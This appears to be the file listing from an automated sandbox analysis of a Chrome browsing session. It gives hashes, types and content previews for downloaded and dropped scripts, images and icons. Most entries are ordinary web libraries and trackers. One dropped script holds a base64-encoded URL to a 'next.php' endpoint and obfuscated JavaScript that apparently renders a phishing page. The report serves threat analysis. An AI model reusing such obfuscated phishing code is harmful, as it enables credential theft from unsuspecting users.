                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19188
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                                                                                                                                                                                                                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65446), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):553324
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.912135280067079
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:JTWsY1akh5JWPJurgWLNW6VF7YlNbx1eX8jumoHL4owSKrthO4bQVw:Eay8oLLc6VF7eNyMjumoHL4owSKrcw
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3374ED36347B8E60EA194F0E92E5CBF9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1E5E84642479DBAEFC9C2EBDF139ED7C943A86E4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3334063FBEB9331659D10E563BA67EDE2B3861C8F186EBB77692C3E4F74D7CC2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:00C9288873622CCD75AE0B471E5A8A8BF225960E5F9203E673A322F538B5D5E5D9EDC31B5D5FF87F0CBA0E925A2CF92AE445A4918E4F293CF052635B00171D25
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var file = "aHR0cHM6Ly9kcml6enlzYW1zb24uY29uc3RydWN0YXBwc29sdXRpb24uY29tL25leHQucGhw";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):293797
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5617905066033035
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:/w3OdmnxuK3frWdCd0YMRoIbpgADF8lTPfD5J312KQm9pYRGPVytqPPsG:IduK3zWCEz+BRxpYRGPVyAXR
                                                                                                                                                                                                                                                                                                                                                                                        MD5:30E8F99C1D5E03E915FE387A3DDFC10C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CF47164F82BFCE262D416AF419C5B073C1B6DDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3B158FA5450FA1ADB6B45FA597F3283A5C32A950F134B937C8B4E14B214DB8F7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E52C904514F3A5A1C62F5DEFC62C6B140818B7B4A3BB1E72FCB56D7DEA37AA40FB137AAE045533C9A3113F5B0C374AE388C02A33B9C381FA36569E3A97A23D0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-991817613","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (56091), with NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):138354
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.399375037370076
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:pE/n3NMDJKBoo1R2fgjbucRrie5ow+UmUVvKTqUsunwLnN80/WuOm1WdGsFGDj:Yn9MDJKBoL4jycNie5oW82UsuiFtsm
                                                                                                                                                                                                                                                                                                                                                                                        MD5:26765DE6F4BD393878D51D4DB837BD7B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:34062962B7C2B5FC027173B96105319FF04423F7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED7FA56DA9E21F70633599C8ED9E20907CFEFB572F17796078E3977B11E60854
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5F561F808059F283F498A5A07CED3BE5B518E6E46CB157965935D92708A5FCA26E62B3B6D1C3C34C554BF83AFCD1113A1467CB3C7D8C6E81E74C437D13826FE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://b-code.liadm.com/a-05td.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){window.LI={"appId":"a-05td","advertiserId":32024,"sync":true,"euns":false,"identifiersToResolve":"_aalyticsuid,trc_cookie_storage,dtm_token,_pubcid,hid,muuid,globalTI_SID,ajs_user_id,_li_uuid,s_ecid,_shopify_y,gup_anonid,s_vi,IXWRAPPERLiveIntentIp,_parrable_id,tmguid,_sharedid,dsq__u,dsq__s","contextSelectors":"title,meta[name='description'],h1,link[rel='canonical']","contextElementsLength":5000,"urlCollectionMode":"full"}}();!function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var n=function(e){try{return!!e()}catch(e){return!0}},r=!n((function(){var e=function(){}.bind();return"function"!=typeof e||e.hasOwnProperty("prototype")})),o=r,i=Function.prototype,s=i.call,a=o&&i.bind.bind(s,s),l=o?a:function(e){return function(){return s.apply(e,arguments)}},c=fu
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5077429145253145
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H2gd6jnEt2NgEj:d6jnEt2NgQ
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5C095943D5919828FE82B54B595FBF54
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C45DC804D68347A1D78DF61A4B2D56DEC83CA756
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DF98EFF4DCA5D7B7054E6C7B36A46B9F60A114ECD04E643BB2B4FB4114397109
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6198EF8F7510E3FCDF8524C63434733A58A81F4BFE2B29033022DC841C638A1DC87CDA9BE07E5A9A25B14A1D687EB57ADEE94DA861A529779BA5D7DF3DA45C11
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl4VaC4zrCRdRIFDQ5ATHMSFwnmJA9fIUq3wBIFDVwvBTcSBQ1_pCqh?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                        Preview:CgkKBw0OQExzGgAKEgoHDVwvBTcaAAoHDX+kKqEaAA==
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):149829
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.600609063029094
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:Cnxj42ndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj4y9OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DAF17286036BD518A93431BAE557255C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8391CECF7FF61062E9DBFD88CC825FEECEAE9D73
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2ADCF9FD70C1C834F4B13D732B66F4900CEC9A6BBDC587B85DBC68CDD9A34BE4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0DB754DA88122CBCE3558CBF5A61062C3AEBAF03F8A8F7D23E96B384993C179668D8930FBE38553D3AC190AABA3063442F7A0469F3A18DB77DF8713F853BA97C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://analytics.tiktok.com/i18n/pixel/static/identify_45dd5971.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):34494
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.04653743900993
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:XyuuuuuuxqwduluuuLvs8uuuuUu0u0uu0uusuuuuuXjYOpKiiYk1usoHyHpIeuuS:gNWp+DC/Gh
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C72E311048FF5468267450C0DBD62F21
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:72DC3A21D09CCE73028931818B48EAECE5C5CA69
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:17121C2079DD1094A616EC9DBC35E7537C3C96DD374D915F03A6B140B59441AD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B09E4D78D716EF231D48614FF1A609367809B48E40EAAD497907346C334FCCDD380459A49CB76CBA0BFF9C65E98E742C66B9BD496CFB12CC55189F9C1F74A3EC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ......................................... ..2XQ..|r... ... .|r..XQ.. ..2............................[T.... ... ..."...>...I...7... ... .[T......................og... ...A..........................e... .og..............[T.... ...x..........S...%... .../...........g... .[T...... ..2.. ... ..........-... ... ... ... ... .......... ... . ..2XQ.... ... ...%......G... ... ... ...n.............. ... .XQ..|r... ... ... ... ... ... ... ...,................... ... .|r... ... ... ... ...d.........(...&.................. ... ... ... ... ... ...K.................. ...O.........'... ... ... .|r... ... ..................... ... ... ... ... ... ... .|r..XQ.... ... ................)... ... ...?..._... ... ... .XQ.. ..2.. ... ...k......./... ... ... ... ...n.......<... ... . ..2....[T.... ...#...........Z.......3..._..........]... .[T..............og... ...+......................
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2175)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2316
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.159085782814747
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:W8WRFsPhd121LnjFm502/am139zmjfEHVQ/Om/RsucFNivRTu+:NCsJd12ZFo02/X139zmjyQmm/Rsucmvv
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3C86C3663DC77BF9299D3A1DBF84B79E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DD56D82CC9DCD2BBE72F7B3F4033F81F1AA95279
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F6D1C4AA4948CBB16037959ABB65DE33038714D3C1FCF977D90EB02A8E50814B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7D8B20F25610352DAA030A0D943C652BF205744298C9F5019C7B2018AF9BEEF223477926CB67706AC38E52733F644612629A3C47CF98563691B1E23D27C09324
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @sentry/integrations 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */.!function(t){var r={};const n=/^(\/?|)([\s\S]*?)((?:\.{1,2}|[^/]+?|)(\.[^./]*|))(?:[/]*)$/;function e(...t){let r="",n=!1;for(let e=t.length-1;e>=-1&&!n;e--){const i=e>=0?t[e]:"/";i&&(r=`${i}/${r}`,n="/"===i.charAt(0))}return r=function(t,r){let n=0;for(let r=t.length-1;r>=0;r--){const e=t[r];"."===e?t.splice(r,1):".."===e?(t.splice(r,1),n++):n&&(t.splice(r,1),n--)}if(r)for(;n--;n)t.unshift("..");return t}(r.split("/").filter((t=>!!t)),!n).join("/"),(n?"/":"")+r||"."}function i(t){let r=0;for(;r<t.length&&""===t[r];r++);let n=t.length-1;for(;n>=0&&""===t[n];n--);return r>n?[]:t.slice(r,n-r+1)}function s(t,r){let e=function(t){const r=n.exec(t);return r?r.slice(1):[]}(t)[2];return r&&e.substr(-1*r.length)===r&&(e=e.substr(0,e.length-r.length)),e}class c{static __initStatic(){this.id="RewriteFrames"}__init(){this.name=c.id}__init2(){this.t="app:///"}constructor(t={}){c.prototype.__init.call(this
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19990
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.984370238774933
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:JJvT3wIzSHW83KGgnY4OoghbWQpTsEMJSNhXTy72hRjg/eWLHfCYMr+Y:JJvsDL43ghTTsE5ni2/bWTqH+Y
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E92BFDC0F61BAAE1B18150316FA1AE84
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CEC8EC35614201EEB497F1657765F27AB92A23F7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E52CE6804ED2DB269C1B675E41B756D6BDE75E64C498850B187ECF889D5A4686
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7D102642383F0674583992BAB3D4B2571A367AFF4A83F88E1AA6FE6AC665D346724E2EC4F5D3741F5CB9E745A605B67440A5726307B44FFE75F7EBCDC5D0D39D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTEqtxnot..[QT[..2LRYxxz.4E*6d*-A.....D...%3`..D.(5UY`...dgp...6Dm{~.EOY6<K0<i..._biZ\a.....:.....__aBEN........EMO.....0......ccf..9..1.....+9h......fglN]nY]f......./gls#&:CHY[ai...........)4Z..%...........,Z....(M$+:............cq....63E9Mx..............}2Cm...OKT9AH1(4L2BmjqT^V...qz.............SW\......$,A........................................}.......""1.........@Ov.......d>H.....)En45S:HGIRsD+5.;C.GT..".O..........q|.........:Jm...em...........'M..........GV......8?W->\.......~.....?LjV_....LOg._]...uQT...m......IV...Nj.py.$48~...g{.....d..Xj.rBM..........lyb......CSc{.q_`.....}zr..hha..........:GX..J^.s..jnc..}...ha..b...{{m......g{^.......T...r..8`.P|..kx...`lV<IbSZ....s~......*_s.l..JZx.n.......G_...(?.r.. .IDATx.|.?h.H..(...).....T.eD18(..v.........A:.^.M..s....K......`.....4...g-...&........W..r...[..Z..{.{...$...d.u..$.e....,Z..h.M....S&..p...?0.?.~
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.984901487578931
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:uDc/tKDfpudd7X8WhdFNxgGc76HGxPxbrnlmQtDAxWdQwRAez9:ud7pmdDVNxw6HG5x91RxRL
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E1C50B82246ADC70D780F8E47128AF86
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AB415ADE74AC5897BD0A8FBE168197D99F70BD03
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:33D670BF211E199C476C63850A51AA6939A19F04A3853A6A909555D453C02FCA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1BD45C1A0FEA031C8E1EA2185383FB46DD8096B0456166D856D39780DC3EEA39A82074A93ADAFBA1B58F8DE09350BCA48BF253A0F3F3D446DA7F7B675E8D85D0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE..........p$.n"..........n$.......n$.......n"....n$.p$.......p".p$................p%.o&....p!..........n..n&.p!....n ...................p#.n".o#......(..$...n".............o(3...n$.p$F#..l# ..6......P..c .m#.m .a!....j".p.j4.9...`..I..d!.K..f!Q(........e!.n.n6..Y..Z e2.z;..o&.T..h".K....@ .a/....N'..G.....l!.k".X!.W.[,.W,..i#.l!+...b !...] .... %.l".m .g!.?....]/..S.K(..E..k .M.......J%..@..F..&*<..u9.U)..Q..^ ...D..^ ....O..aqB#..Uc....m$.=..........)%%...|=.....?..c .8?*...B..V...4.[.7......o).j}.fu.. .HV.h!.?J.i%....j!....{..] .[.b1..T!....w..[j..........p.q7.;..v:...........o(....2:.(1..........P]....!'.N ...$ ...+...l$.EN>!.....l%......$..q9.G%..K NLK....t.a0.Q+.y<..r$/++965....C a__...xuu...L"F/''#"...FDD...P".....VTT2//nkk._G.o*....n,...jhh[D8........ .IDATx...S.W..o7....nz.......a@...E2S..B."..A.*..Q.(.5.2(e*+.......Q.E...h.........C..*.-].!/>.fU...........1.3.......a....(..(....M.ZN....S..<..T.D...
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (926)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1005
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3256441199820355
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:iIe14W22FMNTN2WrhyYKr6nBf956IU7SVSrdr6vlDQVCTwyA:iIOvMpQWPjUrf
                                                                                                                                                                                                                                                                                                                                                                                        MD5:084B955C1FE90091C29BE3591A247080
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0EC06674A1E2F980D2FB86311804F10C572B651E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C319F9593DD29E48BB55818848444DC0F56E70208A61128769F21DDBBC96E4D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:552929FF5F796D400D5A8C05166433829F4DF8F651E8F52C2048990301DECB2F5F5CF5ECAA6BD174E9F307BE0A57A2D9FA6BDBEF0CD6A8F6F74EA0085A5C4676
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/258.72204b.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[258],{45258:(e,a,t)=>{t.r(a),t.d(a,{default:()=>i});var c=t(40880),l=t(96540),n=t(38544),s=t(17230),r=t(84070);const m="_2bfFu3",_="_3PWyTT",d="yYD_1k",o="_1GuHcI",u="_3I2TLE",p=e=>e.wordDocument.translation.translations,i=({close_modal:e,id:a})=>{const t=(0,n.d4)(p),[i,g]=(0,l.useState)(t[0].url);return l.createElement("div",{className:m},l.createElement("h2",{className:_},c.A.t("doc_page.translate_document")),l.createElement("p",{className:d},c.A.t("doc_page.this_document_available_in_languages")),l.createElement(r.z,{className:o,onSelect:g},t.map((({language:e,url:a},t)=>l.createElement(r.z.Item,{key:`${e}_${t}`,value:a,selected:a===i},e)))),l.createElement("div",{className:u},l.createElement(s.QW,{onClick:()=>e(a)},c.A.t("shared.common.cancel")),l.createElement(s.jn,{href:i},c.A.t("doc_page.translate"))))}}}]);.//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/258.72204b.j
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6439
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.279279243238792
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:3rpNnjkH+c+yr7PtADPTbnuiwXJJdQsNVSczoTNl7YOy1vnQGvVO:b3n4eHetAsmoOy1nTs
                                                                                                                                                                                                                                                                                                                                                                                        MD5:40FAA3E08DEEC82C2C290889A4691CB5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FC482B45AF66D78B01D4DAAF4AE1E73D79F50DEC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D17837583F01520ED3504E296DB7904F443D75E3995BFA002C436ED5B9BBEC19
